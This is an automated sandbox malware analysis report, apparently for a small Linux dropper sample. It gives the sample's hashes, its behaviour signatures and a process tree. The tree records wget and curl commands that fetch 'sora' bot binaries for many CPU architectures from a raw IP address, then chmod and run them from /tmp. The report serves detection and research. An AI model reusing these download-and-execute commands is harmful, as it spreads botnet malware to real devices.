Analysis
max time kernel: 16s
max time network: 16s
platform: debian-9_mipsel
resource: debian9-mipsel-20240226-en
resource tags: arch:mipsel, image:debian9-mipsel-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 28-03-2024 10:06
Static task: static1
Behavioral task: behavioral1
  Sample: 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
  Resource: ubuntu1804-amd64-20240226-en
Behavioral task: behavioral2
  Sample: 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
  Resource: debian9-armhf-20240226-en
Behavioral task: behavioral3
  Sample: 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
  Resource: debian9-mipsbe-20240226-en
Behavioral task: behavioral4
  Sample: 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
  Resource: debian9-mipsel-20240226-en
General
Target: 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Size: 1KB
MD5: 02ca1bec2de42845c35867af0dc72be3
SHA1: d2fc439476dd4ec34fce01257762a34b0aa6f3d5
SHA256: 848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54
SHA512: 302e57020da9a74ee02c1f39c81aacb5a4385cedb7a0323ee3ba208d8e58fe5abdf83e2975bc8416ba684e164a512420b550f15569f3243f39a00d4cd99a3dc7
Malware Config
Signatures

Executes dropped EXE (10 IoCs)
Processes (ioc | pid | process):
  /tmp/robben | 736 | robben
  /tmp/robben | 748 | robben
  /tmp/robben | 754 | robben
  /tmp/robben | 760 | robben
  /tmp/robben | 766 | robben
  /tmp/robben | 779 | robben
  /tmp/robben | 797 | robben
  /tmp/robben | 816 | robben
  /tmp/robben | 835 | robben
  /tmp/robben | 841 | robben

Reads runtime system information (10 IoCs)
Reads data from /proc virtual filesystem.
Processes (description | ioc | process):
  File opened for reading | /proc/sys/crypto/fips_enabled | curl
  (the same entry is recorded 10 times, once per curl process)

Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
Processes (description | ioc):
  File opened for modification | /tmp/robben
Processes
(executable path -> command line; triggered signatures in brackets; indented entries are children of the sample process)

/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 -> /tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
    /usr/bin/wget -> wget http://188.127.235.211/bins/sora.x86
    /usr/bin/curl -> curl -O http://188.127.235.211/bins/sora.x86  [Reads runtime system information]
    /bin/cat -> cat sora.x86
    /bin/chmod -> chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
    /tmp/robben -> ./robben Payload  [Executes dropped EXE]

    /usr/bin/wget -> wget http://188.127.235.211/bins/sora.mips
    /usr/bin/curl -> curl -O http://188.127.235.211/bins/sora.mips  [Reads runtime system information]
    /bin/cat -> cat sora.mips
    /bin/chmod -> chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
    /tmp/robben -> ./robben Payload  [Executes dropped EXE]

    /usr/bin/wget -> wget http://188.127.235.211/bins/sora.mpsl
    /usr/bin/curl -> curl -O http://188.127.235.211/bins/sora.mpsl  [Reads runtime system information]
    /bin/cat -> cat sora.mpsl
    /bin/chmod -> chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
    /tmp/robben -> ./robben Payload  [Executes dropped EXE]

    /usr/bin/wget -> wget http://188.127.235.211/bins/sora.arm4
    /usr/bin/curl -> curl -O http://188.127.235.211/bins/sora.arm4  [Reads runtime system information]
    /bin/cat -> cat sora.arm4
    /bin/chmod -> chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
    /tmp/robben -> ./robben Payload  [Executes dropped EXE]

    /usr/bin/wget -> wget http://188.127.235.211/bins/sora.arm5
    /usr/bin/curl -> curl -O http://188.127.235.211/bins/sora.arm5  [Reads runtime system information]
    /bin/cat -> cat sora.arm5
    /bin/chmod -> chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
    /tmp/robben -> ./robben Payload  [Executes dropped EXE]

    /usr/bin/wget -> wget http://188.127.235.211/bins/sora.arm6
    /usr/bin/curl -> curl -O http://188.127.235.211/bins/sora.arm6  [Reads runtime system information]
    /bin/cat -> cat sora.arm6
    /bin/chmod -> chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
    /tmp/robben -> ./robben Payload  [Executes dropped EXE]

    /usr/bin/wget -> wget http://188.127.235.211/bins/sora.arm7
    /usr/bin/curl -> curl -O http://188.127.235.211/bins/sora.arm7  [Reads runtime system information]
    /bin/cat -> cat sora.arm7
    /bin/chmod -> chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
    /tmp/robben -> ./robben Payload  [Executes dropped EXE]

    /usr/bin/wget -> wget http://188.127.235.211/bins/sora.ppc
    /usr/bin/curl -> curl -O http://188.127.235.211/bins/sora.ppc  [Reads runtime system information]
    /bin/cat -> cat sora.ppc
    /bin/chmod -> chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
    /tmp/robben -> ./robben Payload  [Executes dropped EXE]

    /usr/bin/wget -> wget http://188.127.235.211/bins/sora.m68k
    /usr/bin/curl -> curl -O http://188.127.235.211/bins/sora.m68k  [Reads runtime system information]
    /bin/cat -> cat sora.m68k
    /bin/chmod -> chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
    /tmp/robben -> ./robben Payload  [Executes dropped EXE]

    /usr/bin/wget -> wget http://188.127.235.211/bins/sora.sh4
    /usr/bin/curl -> curl -O http://188.127.235.211/bins/sora.sh4  [Reads runtime system information]
    /bin/cat -> cat sora.sh4
    /bin/chmod -> chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
    /tmp/robben -> ./robben Payload  [Executes dropped EXE]